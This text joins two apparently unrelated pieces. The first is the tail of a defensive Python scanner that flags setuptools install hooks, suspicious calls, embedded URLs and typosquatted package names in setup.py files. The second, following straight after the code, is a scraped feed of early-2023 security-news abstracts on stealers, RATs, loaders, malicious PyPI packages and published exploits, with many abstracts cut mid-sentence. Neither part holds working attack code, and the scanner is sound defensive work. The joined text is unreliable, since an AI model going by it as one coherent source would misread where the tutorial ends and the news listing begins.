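    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = _dotted(base) or ""
                if name.split(".")[-1] in INSTALL_HOOK_BASES:
                    findings.append(f"line {node.lineno}: custom setuptools hook {node.name}({name})")
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append(f"line {node.lineno}: call to {name}")
    for match in URL_RE.finditer(source):
        findings.append(f"embedded URL: {match.group(0)}")
    return findings


def typosquat_candidates(name, known=POPULAR, cutoff=0.8):
    """Known names that `name` is a near-miss of (or embeds); empty if `name` is itself known."""
    name = name.lower()
    if name in known:
        return []
    hits = []
    for candidate in known:
        ratio = difflib.SequenceMatcher(None, name, candidate).ratio()
        if ratio >= cutoff or candidate in name:
            hits.append((candidate, round(ratio, 2)))
    return hits


if __name__ == "__main__":
    for line in audit_setup_py(SAMPLE_SETUP_PY):
        print(line)
    for pkg in ("urklib3", "requestsd", "piphttps", "requests"):
        print(pkg, "->", typosquat_candidates(pkg))
```

The AST pass is deliberately conservative: it only matches fully dotted call names, so `from urllib.request import urlopen` followed by `urlopen(...)` would need an import-resolution step to catch, and anything built with `getattr` or string concatenation escapes it entirely. That is why the URL scan runs over the raw text rather than the tree, and why an install-hook subclass is a finding on its own even when nothing else in the file looks suspicious.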
February 21, 2023
PoC exploit code for critical Fortinet FortiNAC bug released online Full Text
Abstract
Researchers at Horizon3 released a proof-of-concept exploit for the critical-severity CVE-2022-39952 vulnerability in the Fortinet FortiNAC network access control solution ... Security Affairs
February 21, 2023
Researchers Discover Numerous Samples of Information Stealer ‘Stealc’ in the Wild Full Text
Abstract
A new information stealer called Stealc that's being advertised on the dark web could emerge as a worthy competitor to other malware of its ilk. "The threat actor presents Stealc as a fully featured and ready-to-use stealer, whose development relied on Vidar, Raccoon, Mars, and RedLine stealers," SEKOIA said in a Monday report. The French cybersecurity company said it discovered more than 40 Stealc samples distributed in the wild and 35 active command-and-control (C2) servers, suggesting that the malware is already gaining traction among criminal groups. Stealc, first marketed by an actor named Plymouth on the XSS and BHF Russian-speaking underground forums on January 9, 2023, is written in C and comes with capabilities to steal data from web browsers, crypto wallets, email clients, and messaging apps. The malware-as-a-service (MaaS) also boasts of a "customizable" file grabber that allows its buyers to tailor the module to siphon files o ... The Hacker News
February 21, 2023
Stealc, a new advanced infostealer appears in the threat landscape Full Text
Abstract
Researchers spotted a new information stealer, called Stealc, which supports a wide set of stealing capabilities. In January 2023, researchers at SEKOIA.IO discovered a new information stealer, dubbed Stealc, which was advertised in the dark web forums....Security Affairs
February 21, 2023
Researchers Warn of ReverseRAT Backdoor Targeting Indian Government Agencies Full Text
Abstract
A spear-phishing campaign targeting Indian government entities aims to deploy an updated version of a backdoor called ReverseRAT. Cybersecurity firm ThreatMon attributed the activity to a threat actor tracked as SideCopy. SideCopy is a threat group of Pakistani origin that shares overlaps with another actor called Transparent Tribe. It is so named for mimicking the infection chains associated with SideWinder to deliver its own malware. The adversarial crew was first observed delivering ReverseRAT in 2021, when Lumen's Black Lotus Labs detailed a set of attacks targeting victims aligned with the government and power utility verticals in India and Afghanistan. Recent attack campaigns associated with SideCopy have primarily set their sights on a two-factor authentication solution known as Kavach (meaning "armor" in Hindi) that's used by Indian government officials. The infection journey documented by ThreatMon commences with a phishing email containi ... The Hacker News
February 19, 2023
Havoc Replaces Cobalt Strike and Brute Ratel Full Text
Abstract
Threat actors have been switching to a new open-source C2 framework, dubbed Havoc, as an alternative to Brute Ratel and Cobalt Strike, researchers stated. The advanced post-exploitation C2 framework can bypass even the most updated version of Windows 11 Defender. An unknown threat group dropp ... Cyware
February 19, 2023
Frebniis malware abuses Microsoft IIS feature to create a backdoor Full Text
Abstract
Broadcom Symantec researchers have spotted a new malware, tracked as Frebniis, that abuses a Microsoft Internet Information Services (IIS) feature to deploy a backdoor and monitor all HTTP traffic to the system ... Security Affairs
February 18, 2023
New Frebniis Malware Abuses IIS Features for Secret Communications Full Text
Abstract
There's a new malware threat to Microsoft Internet Information Services (IIS) servers dubbed Frebniis. Discovered by Symantec's Threat Hunter Team, the malware abuses the 'Failed Request Event Buffering' (FREB) feature of IIS that is responsible for collecting request metadata such as IP addresses, HTTP ... Cyware
February 17, 2023
Experts Warn of RambleOn Android Malware Targeting South Korean Journalists Full Text
Abstract
Suspected North Korean nation-state actors targeted a journalist in South Korea with a malware-laced Android app as part of a social engineering campaign. The findings come from South Korea-based non-profit Interlab, which coined the new malware RambleOn . The malicious functionalities include the "ability to read and leak target's contact list, SMS, voice call content, location and others from the time of compromise on the target," Interlab threat researcher Ovi Liber said in a report published this week. The spyware camouflages as a secure chat app called Fizzle (ch.seme), but in reality, acts as a conduit to deliver a next-stage payload hosted on pCloud and Yandex. The chat app is said to have been sent as an Android Package (APK) file over WeChat to the targeted journalist on December 7, 2022, under the pretext of wanting to discuss a sensitive topic. The primary purpose of RambleOn is to function as a loader for another APK file ( com.data.WeCoin ) whileThe Hacker News
February 17, 2023
New Frebniis Malware Abuses Microsoft IIS Feature to Establish Backdoor Full Text
Abstract
Frebniis ensures Failed Request Tracing is enabled and then accesses w3wp.exe (IIS) process memory, obtaining the address of where the Failed Request Event Buffering code (iisfreb.dll) is loaded.Cyware
February 15, 2023
Beep, a new highly evasive malware appeared in the threat landscape Full Text
Abstract
Experts detected a new evasive malware dubbed Beep that implements many anti-debugging and anti-sandbox techniques. Researchers from Minerva recently discovered a new evasive malware dubbed Beep, which implements many anti-debugging and anti-sandbox...Security Affairs
February 15, 2023
Experts Warn of ‘Beep’ - A New Evasive Malware That Can Fly Under the Radar Full Text
Abstract
Cybersecurity researchers have unearthed a new piece of evasive malware dubbed Beep that's designed to fly under the radar and drop additional payloads onto a compromised host. "It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find," Minerva Labs researcher Natalie Zargarov said . "One such technique involved delaying execution through the use of the Beep API function , hence the malware's name." Beep comprises three components, the first of which is a dropper that's responsible for creating a new Windows Registry key and executing a Base64-encoded PowerShell script stored in it. The PowerShell script, for its part, reaches out to a remote server to retrieve an injector, which, after confirming it's not being debugged or launched in a virtual machine, extracts and launches the payload via a technique called process hollowing . The payload is anThe Hacker News
February 14, 2023
Python Developers Beware: Clipper Malware Found in 450+ PyPI Packages! Full Text
Abstract
Malicious actors have published more than 451 unique Python packages on the official Python Package Index (PyPI) repository in an attempt to infect developer systems with clipper malware . Software supply chain security company Phylum, which spotted the libraries , said the ongoing activity is a follow-up to a campaign that was initially disclosed in November 2022. The initial vector entails using typosquatting to mimic popular packages such as beautifulsoup, bitcoinlib, cryptofeed, matplotlib, pandas, pytorch, scikit-learn, scrapy, selenium, solana, and tensorflow, among others. "After installation, a malicious JavaScript file is dropped to the system and executed in the background of any web browsing session," Phylum said in a report published last year. "When a developer copies a cryptocurrency address, the address is replaced in the clipboard with the attacker's address." This is achieved by creating a Chromium web browser extension in the WindowThe Hacker News
February 14, 2023
Experts discover over 451 clipper malware-laced packages in the PyPI repository Full Text
Abstract
Threat actors published more than 451 unique malware-laced Python packages on the official Python Package Index (PyPI) repository. Phylum researchers spotted more than 451 unique Python packages on the official Python Package Index (PyPI) repository...Security Affairs
February 14, 2023
Enigma info-stealing malware targets the cryptocurrency industry Full Text
Abstract
Alleged Russian threat actors have been targeting cryptocurrency users in Eastern Europe with Enigma info-stealing malware. A malware campaign conducted by alleged Russian threat actors has been targeting users in Eastern Europe in the crypto industry....Security Affairs
February 10, 2023
Researchers Uncover Obfuscated Malicious Code in PyPI Python Packages Full Text
Abstract
Four different rogue packages in the Python Package Index ( PyPI ) have been found to carry out a number of malicious actions, including dropping malware, deleting the netstat utility, and manipulating the SSH authorized_keys file. The packages in question are aptx , bingchilling2 , httops , and tkint3rs , all of which were collectively downloaded about 450 times before they were taken down. While aptx is an attempt to impersonate Qualcomm's highly popular audio codec of the same name, httops and tkint3rs are typosquats of https and tkinter, respectively. "Most of these packages had well thought out names, to purposely confuse people," Security researcher and journalist Ax Sharma said . An analysis of the malicious code injected in the setup script reveals the presence of an obfuscated Meterpreter payload that's disguised as " pip ," a legitimate package installer for Python, and can be leveraged to gain shell access to the infected host. AlsoThe Hacker News
February 10, 2023
Android mobile devices from top vendors in China have pre-installed malware Full Text
Abstract
Researchers reported that the top-of-the-line Android mobile devices sold in China are shipped with malware. China is currently the country with the largest number of Android mobile devices, but a recent study conducted by researchers from the University...Security Affairs
February 9, 2023
Enigma Stealer Targets Cryptocurrency Industry with Fake Jobs Full Text
Abstract
The initial stage of Enigma, Interview conditions.word.exe, is a downloader written in C++. Its primary objective is to download, deobfuscate, decompress, and launch the secondary stage payload.Cyware
February 9, 2023
Quasar RAT Propagated via Private Home Trading System Full Text
Abstract
A private Home Trading System is used to spread the Quasar RAT virus, according to ASEC. In other cases, phoney investment firms that passed for real ones persuaded customers to install a fake HTS so they could steal their money. Quasar RAT comes with remote command execution and uploading and down ... Read MoreCyware
February 09, 2023
Gootkit Malware Adopts New Tactics to Attack Healthcare and Finance Firms Full Text
Abstract
The Gootkit malware is prominently going after healthcare and finance organizations in the U.S., U.K., and Australia, according to new findings from Cybereason. The cybersecurity firm said it investigated a Gootkit incident in December 2022 that adopted a new method of deployment, with the actors abusing the foothold to deliver Cobalt Strike and SystemBC for post-exploitation. "The threat actor displayed fast-moving behaviors, quickly heading to control the network it infected, and getting elevated privileges in less than 4 hours," Cybereason said in an analysis published February 8, 2023. Gootkit, also called Gootloader, is exclusively attributed to a threat actor tracked by Mandiant as UNC2565. Starting its life in 2014 as a banking trojan, the malware has since morphed into a loader capable of delivering next-stage payloads. The shift in tactics was first uncovered by Sophos in March 2021. Gootloader takes the form of heavily-obfuscated JavaScript files thatThe Hacker News
February 8, 2023
New Graphiron info-stealer used in attacks against Ukraine Full Text
Abstract
A Russia-linked threat actor has been observed deploying a new information stealer dubbed Graphiron in attacks against Ukraine. Researchers from Broadcom Symantec spotted a Russia-linked APT group, tracked as Nodaria (aka UAC-0056), deploying new info-stealing...Security Affairs
February 7, 2023
AveMaria Info-stealer Changes its Strategy to Infect More Users Full Text
Abstract
Zscaler’s ThreatLabz disclosed details about a new infostealer AveMaria RAT that targets sensitive data with added capabilities of remote camera control and privilege escalation. Over the past six months, the operators behind the info-stealer have been making significant additions to the execution ... Read MoreCyware
February 7, 2023
Banking Trojan TgToxic Targets Android Users in Southeast Asia Full Text
Abstract
Trend Micro experts took the wraps off of an ongoing campaign that has been targeting Android users in Southeast Asia since July 2022. It involves embedding a trojan they named TgToxic for harvesting user data from multiple fake finance and banking apps, including cryptocurrency wallets. The sample ... Read MoreCyware
February 06, 2023
GuLoader Malware Using Malicious NSIS Executables to Target E-Commerce Industry Full Text
Abstract
E-commerce industries in South Korea and the U.S. are at the receiving end of an ongoing GuLoader malware campaign, cybersecurity firm Trellix disclosed late last month. The malspam activity is notable for transitioning away from malware-laced Microsoft Word documents to NSIS executable files for loading the malware. Other countries targeted as part of the campaign include Germany, Saudi Arabia, Taiwan and Japan. NSIS , short for Nullsoft Scriptable Install System, is a script-driven open source system used to develop installers for the Windows operating system. While attack chains in 2021 leveraged a ZIP archive containing a macro-laced Word document to drop an executable file tasked with loading GuLoader, the new phishing wave employs NSIS files embedded within ZIP or ISO images to activate the infection. "Embedding malicious executable files in archives and images can help threat actors evade detection," Trellix researcher Nico Paulo Yturriaga said . Over the couThe Hacker News
February 06, 2023
FormBook Malware Spreads via Malvertising Using MalVirt Loader to Evade Detection Full Text
Abstract
An ongoing malvertising campaign is being used to distribute virtualized .NET loaders that are designed to deploy the FormBook information-stealing malware. "The loaders, dubbed MalVirt, use obfuscated virtualization for anti-analysis and evasion along with the Windows Process Explorer driver for terminating processes," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a technical write-up. The shift to Google malvertising is the latest example of how crimeware actors are devising alternate delivery routes to distribute malware ever since Microsoft announced plans to block the execution of macros in Office by default from files downloaded from the internet. Malvertising entails placing rogue search engine advertisements in hopes of tricking users searching for popular software like Blender into downloading the trojanized software. The MalVirt loaders, which are implemented in .NET, use the legitimate KoiVM virtualizing protector for .NET applicatiThe Hacker News
February 6, 2023
MalVirt Loader Distributes Formbook and XLoader with Unusual Levels of Obfuscation Full Text
Abstract
Cybercriminals were found distributing virtualized .NET malware loaders, dubbed MalVirt, in a Google Ads-based malvertising campaign to install the Formbook stealer and XLoader. The hackers used KoiVM virtualization technology to obfuscate their implementation and execution in their campaigns. The ... Read MoreCyware
February 04, 2023
PixPirate: New Android Banking Trojan Targeting Brazilian Financial Institutions Full Text
Abstract
A new Android banking trojan has set its eyes on Brazilian financial institutions to commit fraud by leveraging the PIX payments platform. Italian cybersecurity company Cleafy, which discovered the malware between the end of 2022 and the beginning of 2023, is tracking it under the name PixPirate. "PixPirate belongs to the newest generation of Android banking trojan, as it can perform ATS ( Automatic Transfer System ), enabling attackers to automate the insertion of a malicious money transfer over the Instant Payment platform Pix, adopted by multiple Brazilian banks," researchers Francesco Iubatti and Alessandro Strino said . It is also the latest addition in a long list of Android banking malware to abuse the operating system's accessibility services API to carry out its nefarious functions, including disabling Google Play Protect, intercepting SMS messages, preventing uninstallation, and serving rogue ads via push notifications. Besides stealing passwords enteredThe Hacker News
February 03, 2023
Post-Macro World Sees Rise in Microsoft OneNote Documents Delivering Malware Full Text
Abstract
In a continuing sign that threat actors are adapting well to a post-macro world , it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise. Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer , Agent Tesla, DOUBLEBACK , Quasar RAT, XWorm, Qakbot , BATLOADER , and FormBook . Enterprise firm Proofpoint said it detected over 50 campaigns leveraging OneNote attachments in the month of January 2023 alone. In some instances, the email phishing lures contain a OneNote file, which, in turn, embeds an HTA file that invokes a PowerShell script to retrieve a malicious binary from a remote server. Other scenarios entail the execution of a rogue VBScript that's embedded within the OneNote document and concealed behind an image that appears as a seemingly harmless button. The VBScript, for its part, is designed to drop a PowerShell script to run DOUBLEBACK. "The Hacker News
February 3, 2023
IceBreaker Backdoor Targets Gaming/Gambling Companies Full Text
Abstract
Online gaming and gambling firms are once again under attack by a never-before-seen backdoor known as IceBreaker. According to security analysts at SecurityJoes, the malware’s compromise method relies on tricking customer service agents into opening malicious screenshots that the threat actor sent ... Read MoreCyware
February 3, 2023
Konami Code Backdoor Concealed in Image File of Fake WordPress Plugins Full Text
Abstract
The malware was first detected back in 2019 within a compromised Drupal environment. However, over the last few months, it appears to have surged in popularity among attackers. It tends to be uploaded into WordPress environments as a fake plugin.Cyware
February 02, 2023
New Russian-Backed Gamaredon’s Spyware Variants Targeting Ukrainian Authorities Full Text
Abstract
The State Cyber Protection Centre (SCPC) of Ukraine has called out the Russian state-sponsored threat actor known as Gamaredon for its targeted cyber attacks on public authorities and critical information infrastructure in the country. The advanced persistent threat, also known as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and UAC-0010, has a track record of striking Ukrainian entities dating as far back as 2013. "UAC-0010 group's ongoing activity is characterized by a multi-step download approach and executing payloads of the spyware used to maintain control over infected hosts," the SCPC said . "For now, the UAC-0010 group uses GammaLoad and GammaSteel spyware in their campaigns." GammaLoad is a VBScript dropper malware engineered to download next-stage VBScript from a remote server. GammaSteel is a PowerShell script that's capable of conducting reconnaissance and executing additional commands. The goal of tThe Hacker News
February 1, 2023
New Prilex PoS Malware evolves to target NFC-enabled credit cards Full Text
Abstract
Authors of the Prilex PoS malware improved their malicious code to target contactless credit card transactions. The threat actors behind the sophisticated point-of-sale (PoS) malware Prilex have improved its capabilities to block contactless...Security Affairs
February 01, 2023
New SH1MMER Exploit for Chromebook Unenrolls Managed ChromeOS Devices Full Text
Abstract
A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control. Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console , including the features that are available to users. "Each enrolled device complies with the policies you set until you wipe or deprovision it," Google states in its documentation. That's where the exploit – dubbed Shady Hacking 1nstrument Makes Machine Enrollment Retreat aka SH1MMER – comes in, allowing users to bypass these admin restrictions. The method is also a reference to shim, a Return Merchandise Authorization (RMA) disk image used by service center technicians to reinstall the operating system and run diagnosis and repair programs. The Google-signed shim image is a "combination of existing Chrome OS factory bundle components" – namely a release image, a toolkit, and the firmware, amonThe Hacker News
February 01, 2023
Prilex PoS Malware Evolves to Block Contactless Payments to Steal from NFC Cards Full Text
Abstract
The Brazilian threat actors behind an advanced and modular point-of-sale (PoS) malware known as Prilex have reared their head once again with new updates that allow it to block contactless payment transactions. Russian cybersecurity firm Kaspersky said it detected three versions of Prilex (06.03.8080, 06.03.8072, and 06.03.8070) that are capable of targeting NFC-enabled credit cards, taking its criminal scheme a notch higher. Having evolved out of ATM-focused malware into PoS malware over the years since going operational in 2014, the threat actor steadily incorporated new features that are designed to facilitate credit card fraud, including a technique called GHOST transactions . While contactless payments have taken off in a big way, in part due to the COVID-19 pandemic, the underlying motive behind the new functionality is to disable the feature so as to force the user to insert the card into the PIN pad. To that end, the latest version of Prilex, which Kaspersky discoverThe Hacker News
February 1, 2023
TrickGate, a packer used by malware to evade detection since 2016 Full Text
Abstract
TrickGate is a shellcode-based packer offered as a service to malware authors to avoid detection, CheckPoint researchers reported. TrickGate is a shellcode-based packer offered as a service, in use since at least July 2016, to hide malware...Security Affairs
January 31, 2023
New GOOTLOADER Variant Evolves Further with New Obfuscation Tricks Full Text
Abstract
The UNC2565 hacker group appears to have restructured its GOOTLOADER (or Gootkit) malware by adding new components and implementing new obfuscation techniques. Gootkit is used by adversaries to drop additional malicious payloads, such as SunCrypt, REvil (Sodinokibi) ransomware, Kronos trojan, and C ... Read MoreCyware
January 31, 2023
New Report Reveals NikoWiper Malware That Targeted Ukraine Energy Sector Full Text
Abstract
The Russia-affiliated Sandworm used yet another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine. "The NikoWiper is based on SDelete , a command line utility from Microsoft that is used for securely deleting files," cybersecurity company ESET revealed in its latest APT Activity Report shared with The Hacker News. The Slovak cybersecurity firm said the attacks coincided with missile strikes orchestrated by the Russian armed forces aimed at the Ukrainian energy infrastructure, suggesting overlaps in objectives. The disclosure comes merely days after ESET attributed Sandworm to a Golang-based data wiper known as SwiftSlicer that was deployed against an unnamed Ukrainian entity on January 25, 2023. The advanced persistent threat (APT) group linked to Russia's foreign military intelligence agency GRU has also been implicated in a partially successful attack targeting nationalThe Hacker News
January 31, 2023
Experts released VMware vRealize Log RCE exploit for CVE-2022-31706 Full Text
Abstract
Horizon3 security researchers released proof-of-concept (PoC) code for VMware vRealize Log Insight RCE vulnerability CVE-2022-31706. Last week, researchers from Horizon3’s Attack Team announced the release of PoC exploit code for remote code execution...Security Affairs
January 31, 2023
Researchers Uncover Packer Used by Several Malware to Evade Detection for 6 Years Full Text
Abstract
A shellcode-based packer dubbed TrickGate has been successfully operating without attracting notice for over six years, while enabling threat actors to deploy a wide range of malware such as TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil over the years. "TrickGate managed to stay under the radar for years because it is transformative – it undergoes changes periodically," Check Point Research's Arie Olshtein said , calling it a "master of disguises." Offered as a service to other threat actors since at least late 2016, TrickGate helps conceal payloads behind a layer of wrapper code in an attempt to get past security solutions installed on a host. Packers can also function as crypters by encrypting the malware as an obfuscation mechanism. "Packers have different features that allow them to circumvent detection mechanisms by appearing as benign files, being difficult to reverse engineer, or incorporating sandbox evasion tecThe Hacker News
January 30, 2023
Titan Stealer: A New Golang-Based Information Stealer Malware Emerges Full Text
Abstract
A new Golang-based information stealer malware dubbed Titan Stealer is being advertised by threat actors through their Telegram channel. "The stealer is capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files," Uptycs security researchers Karthickkumar Kathiresan and Shilpesh Trivedi said in a recent report. Details of the malware were first documented by cybersecurity researcher Will Thomas (@BushidoToken) in November 2022 by querying the IoT search engine Shodan. Titan is offered as a builder, enabling customers to customize the malware binary to include specific functionalities and the kind of information to be exfiltrated from a victim's machine. The malware, upon execution, employs a technique known as process hollowing to inject the malicious payload into the memory of a legitimate process known as AppLaThe Hacker News
January 30, 2023
Gootkit Malware Evolves with New Components and Obfuscations Full Text
Abstract
Gootkit runs on an access-as-a-service model used by different groups to drop additional malicious payloads on compromised systems. It has been known to use fileless techniques to deliver threats such as SunCrypt, REvil, Kronos, and Cobalt Strike.Cyware
January 30, 2023
Godfather Banking Trojan Expands Application Targeting to Affect More Europe-Based Victims Full Text
Abstract
The most notable features of Godfather malware are bypassing 2FA by capturing SMS texts or notifications and executing itself as an Android service by abusing Accessibility Services to keep persistent and privileged access on infected devices.Cyware
January 29, 2023
Gootkit Malware Continues to Evolve with New Components and Obfuscations Full Text
Abstract
The threat actors associated with the Gootkit malware have made "notable changes" to their toolset, adding new components and obfuscations to their infection chains. Google-owned Mandiant is monitoring the activity cluster under the moniker UNC2565 , noting that the usage of the malware is "exclusive to this group." Gootkit , also called Gootloader, is spread through compromised websites that victims are tricked into visiting when searching for business-related documents like agreements and contracts via a technique called search engine optimization (SEO) poisoning. The purported documents take the form of ZIP archives that harbor the JavaScript malware, which, when launched, paves the way for additional payloads such as Cobalt Strike Beacon , FONELAUNCH, and SNOWCONE. FONELAUNCH is a .NET-based loader designed to load an encoded payload into memory, and SNOWCONE is a downloader that's tasked with retrieving next-stage payloads, typically IcedID , viaThe Hacker News
January 29, 2023
Watch out! Experts plan to release VMware vRealize Log RCE exploit next week Full Text
Abstract
Horizon3's Attack Team made the headlines again, announcing the release of PoC exploit code for remote code execution in VMware vRealize Log. Researchers from Horizon3's Attack Team announced the release of PoC exploit code for remote code execution...Security Affairs
January 27, 2023
Aurora Infostealer Malware Deploys Shapeshifting Tactics Full Text
Abstract
Cyble researchers determined that, in order to target a variety of well-known applications, the attackers are actively changing and customizing their phishing websites. Aurora targets data from web browsers and crypto wallets, among others.Cyware
January 27, 2023
Python-based PY#RATION RAT Stealthily Harvests Sensitive Information Full Text
Abstract
PY#RATION can transfer files from the infected host machine to its C2 servers or vice versa. It uses WebSockets to avoid detection and for C2 communication and exfiltration.Cyware
January 27, 2023
Researchers Discover New PlugX Malware Variant Spreading via Removable USB Devices Full Text
Abstract
Cybersecurity researchers have uncovered a PlugX sample that employs sneaky methods to infect attached removable USB media devices in order to propagate the malware to additional systems. "This PlugX variant is wormable and infects USB devices in such a way that it conceals itself from the Windows operating file system," Palo Alto Networks Unit 42 researchers Mike Harbison and Jen Miller-Osborn said . "A user would not know their USB device is infected or possibly used to exfiltrate data out of their networks." The cybersecurity company said it uncovered the artifact during an incident response effort following a Black Basta ransomware attack against an unnamed victim. Other tools discovered in the compromised environment include the Gootkit malware loader and the Brute Ratel C4 red team framework. The use of Brute Ratel by the Black Basta group was previously highlighted by Trend Micro in October 2022, with the software delivered as a second-stageThe Hacker News
January 27, 2023
3 Lifehacks While Analyzing Orcus RAT in a Malware Sandbox Full Text
Abstract
Orcus is a Remote Access Trojan with some distinctive characteristics. The RAT allows attackers to create plugins and offers a robust core feature set that makes it quite a dangerous malicious program in its class. RAT is quite a stable type that always makes it to the top (ANY.RUN's top malware types in 2022). That's why you'll definitely come across this type in your practice, and the Orcus family specifically. To simplify your analysis, we have collected 3 lifehacks you should take advantage of. Here we go. What is Orcus RAT? Definition. Orcus RAT is a type of malicious software program that enables remote access and control of computers and networks. It is a type of Remote Access Trojan (RAT) that has been used by attackers to gain access to and control computers and networks. Capabilities. Once downloaded onto a computer or network, it begins to execute its malicious code, allowing the attacker to gain access and control. It is capable of stealing data, conductinThe Hacker News
January 26, 2023
PY#RATION: New Python-based RAT Uses WebSocket for C2 and Data Exfiltration Full Text
Abstract
Cybersecurity researchers have unearthed a new attack campaign that leverages a Python-based remote access trojan (RAT) to gain control over compromised systems since at least August 2022. "This malware is unique in its utilization of WebSockets to avoid detection and for both command-and-control (C2) communication and exfiltration," Securonix said in a report shared with The Hacker News. The malware, dubbed PY#RATION by the cybersecurity firm, comes with a host of capabilities that allows the threat actor to harvest sensitive information. Later versions of the backdoor also sport anti-evasion techniques, suggesting that it's being actively developed and maintained. The attack commences with a phishing email containing a ZIP archive, which, in turn, harbors two shortcut (.LNK) files that masquerade as front and back side images of a seemingly legitimate U.K. driver's license. Opening each of the .LNK files retrieves two text files from a remote server that aThe Hacker News
January 24, 2023
Emotet Malware Makes a Comeback with New Evasion Techniques Full Text
Abstract
The Emotet malware operation has continued to refine its tactics in an effort to fly under the radar, while also acting as a conduit for other dangerous malware such as Bumblebee and IcedID. Emotet, which officially reemerged in late 2021 following a coordinated takedown of its infrastructure by authorities earlier that year, has continued to be a persistent threat that's distributed via phishing emails. Attributed to a cybercrime group tracked as TA542 (aka Gold Crestwood or Mummy Spider), the virus has evolved from a banking trojan to a malware distributor since its first appearance in 2014. The malware-as-a-service (MaaS) is also modular, capable of deploying an array of proprietary and freeware components that can exfiltrate sensitive information from compromised machines and carry out other post-exploitation activities. Two latest additions to Emotet's module arsenal comprise an SMB spreader that's designed to facilitate lateral movement using a list of hThe Hacker News
January 23, 2023
Malicious Apps Masquerade as Government Agencies to Distribute Gigabud RAT Full Text
Abstract
A new Android malware, named Gigabud, was found impersonating government agencies, financial institutions, and other organizations from Thailand, Peru, and the Philippines to harvest user banking credentials. Gigabud leverages a server-side verification process to ensure that the mobile number ... Read MoreCyware
January 22, 2023
Roaming Mantis uses new DNS changer in its Wroba mobile malware Full Text
Abstract
Roaming Mantis threat actors were observed using a new variant of their mobile malware Wroba to hijack DNS settings of Wi-Fi routers. Researchers from Kaspersky observed Roaming Mantis threat actors using an updated variant of their mobile malware...Security Affairs
January 21, 2023
Attackers Crafted Custom Malware for Fortinet Zero-Day Full Text
Abstract
Researchers analyzing data associated with a recently disclosed zero-day vulnerability in Fortinet's FortiOS SSL-VPN technology have identified a sophisticated new backdoor specifically designed to run on Fortinet's FortiGate firewalls.Cyware
January 20, 2023
Roaming Mantis Spreading Mobile Malware That Hijacks Wi-Fi Routers’ DNS Settings Full Text
Abstract
Threat actors associated with the Roaming Mantis attack campaign have been observed delivering an updated variant of their patent mobile malware known as Wroba to infiltrate Wi-Fi routers and undertake Domain Name System ( DNS ) hijacking. Kaspersky, which carried out an analysis of the malicious artifact, said the feature is designed to target specific Wi-Fi routers located in South Korea. Roaming Mantis, also known as Shaoye, is a long-running financially motivated operation that singles out Android smartphone users with malware capable of stealing bank account credentials as well as harvesting other kinds of sensitive information. Although primarily targeting the Asian region since 2018, the hacking crew was detected expanding its victim range to include France and Germany for the first time in early 2022 by camouflaging the malware as the Google Chrome web browser application. The attacks leverage smishing messages as the initial intrusion vector of choice to deliverThe Hacker News
January 19, 2023
Roaming Mantis implements new DNS changer in its malicious mobile app in 2022 Full Text
Abstract
Roaming Mantis (aka Shaoye) is a well-known campaign that uses malicious APK files to control infected Android devices and steal device information; it also uses phishing pages to steal user credentials, with a strong financial motivation.Cyware
January 19, 2023
Android Users Beware: New Hook Malware with RAT Capabilities Emerges Full Text
Abstract
The threat actor behind the BlackRock and ERMAC Android banking trojans has unleashed yet another malware for rent called Hook that introduces new capabilities to access files stored in the devices and create a remote interactive session. ThreatFabric, in a report shared with The Hacker News, characterized Hook as a novel ERMAC fork that's advertised for sale for $7,000 per month while featuring "all the capabilities of its predecessor." "In addition, it also adds to its arsenal Remote Access Tooling (RAT) capabilities, joining the ranks of families such as Octo and Hydra, which are capable of performing a full Device Take Over (DTO), and complete a full fraud chain, from PII exfiltration to transaction, with all the intermediate steps, without the need of additional channels," the Dutch cybersecurity firm said. A majority of the financial apps targeted by the malware are located in the U.S., Spain, Australia, Poland, Canada, Turkey, the U.K., Fran... The Hacker News
January 19, 2023
Critical Microsoft Azure RCE flaw impacted multiple services Full Text
Abstract
Researchers found a new critical remote code execution (RCE) flaw impacting multiple services related to Microsoft Azure. Researchers from Ermetic found a remote code execution flaw, dubbed EmojiDeploy, that impacts Microsoft Azure services and other...Security Affairs
January 19, 2023
Batloader Abused Legitimate Tools in Q4 2022 Full Text
Abstract
Trend Micro laid bare details of the Batloader malware in a report: the malware has anti-sandboxing capabilities and can fingerprint hosts to check they are real victims rather than analysis systems. The modular malware abuses legitimate tools such as NirCmd.exe and NSudo.exe to escalate privileges. First observed in the last quarter of 2022, it was foun... Cyware
January 18, 2023
Earth Bogle Campaign Unleashes NjRAT Trojan on Middle East and North Africa Full Text
Abstract
An ongoing campaign dubbed Earth Bogle is leveraging geopolitical-themed lures to deliver the NjRAT remote access trojan to victims across the Middle East and North Africa. "The threat actor uses public cloud storage services such as files[.]fm and failiem[.]lv to host malware, while compromised web servers distribute NjRAT," Trend Micro said in a report published Wednesday. Phishing emails, typically tailored to the victim's interests, are loaded with malicious attachments to activate the infection routine. This takes the form of a Microsoft Cabinet (CAB) archive file containing a Visual Basic Script dropper to deploy the next-stage payload. Alternatively, it's suspected that the files are distributed via social media platforms such as Facebook and Discord, in some cases even creating bogus accounts to serve ads on pages impersonating legitimate news outlets. The CAB files, hosted on cloud storage services, also masquerade as sensitive voice calls to entice... The Hacker News
January 18, 2023
Abuse of GitHub Codespaces may Turn it into Malware Distribution Center Full Text
Abstract
New research revealed that a feature in GitHub Codespaces could be exploited by threat actors to deliver malware of their choice to a compromised device. Experts at Trend Micro demonstrated a scenario where they could serve malicious content at a rapid rate by exposing ports to the public.Cyware
January 17, 2023
Rhadamanthys Stealer Spreads via Spam Emails and Google Ads Full Text
Abstract
